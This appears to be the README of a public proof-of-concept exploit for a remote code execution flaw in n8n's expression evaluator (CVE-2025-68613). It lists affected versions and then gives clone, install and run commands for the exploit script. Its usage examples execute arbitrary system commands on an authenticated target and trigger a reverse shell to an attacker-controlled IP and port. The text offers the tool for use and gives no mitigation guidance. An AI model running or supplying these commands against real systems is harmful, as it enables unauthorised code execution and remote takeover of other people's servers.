Proof of Concept (PoC) exploit for a critical Remote Code Execution vulnerability in the n8n workflow automation platform.
The vulnerability exists in the n8n expression evaluation system. User-supplied expressions are not properly sandboxed, allowing authenticated attackers to execute arbitrary code on the host system.
CVE ID: CVE-2025-68613
Vulnerability Type: Remote Code Execution (RCE)
Component: Expression Evaluator
- n8n >= 0.211.0
- n8n < 1.120.4
- n8n < 1.121.1
- n8n < 1.122.0
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txtpython3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]-t, --target: Target URL (e.g., http://localhost:5678)-u, --username: n8n account email address-p, --password: n8n account password-c, --cmd: System command to execute--reverse-shell: Trigger a reverse shell (Format: IP PORT)
python3 n8n_exploit.py -t http://target:5678 -u admin@example.com -p "P@ssword123" -c "id"python3 n8n_exploit.py -t http://target:5678 -u admin@example.com -p "P@ssword123" --reverse-shell 192.168.1.100 4444